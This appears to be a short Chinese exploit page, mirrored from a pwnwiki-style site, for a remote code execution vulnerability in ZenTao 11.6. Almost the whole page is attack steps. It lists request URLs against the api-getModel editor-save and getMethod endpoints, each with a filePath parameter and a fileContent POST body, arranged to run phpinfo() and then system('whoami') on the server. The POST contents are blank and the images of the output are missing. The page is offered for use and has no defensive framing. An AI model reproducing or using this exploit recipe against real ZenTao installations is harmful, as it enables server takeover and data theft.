禪道_11.6_遠程代碼執行漏洞-棉花糖会员站

# 禪道 11.6 遠程代碼執行漏洞
==漏洞利用==

===遠程代碼執行命令phpnifo();===

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111

POST: fileContent=

![](/static/pwnwiki/img/20200909170608141.png )

====Payload2====

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1

POST: fileContent=

![](/static/pwnwiki/img/20200909170608208.png )

===遠程代碼執行命令system('whoami');===

====Payload1====

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222

POST: fileContent=

![](/static/pwnwiki/img/20200909170608153.png )

====Payload2====

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2

POST: fileContent=

![](/static/pwnwiki/img/20200909170608326.png )

文章版权归作者所有，未经允许请勿转载。

THE END

禪道_11.6_遠程代碼執行漏洞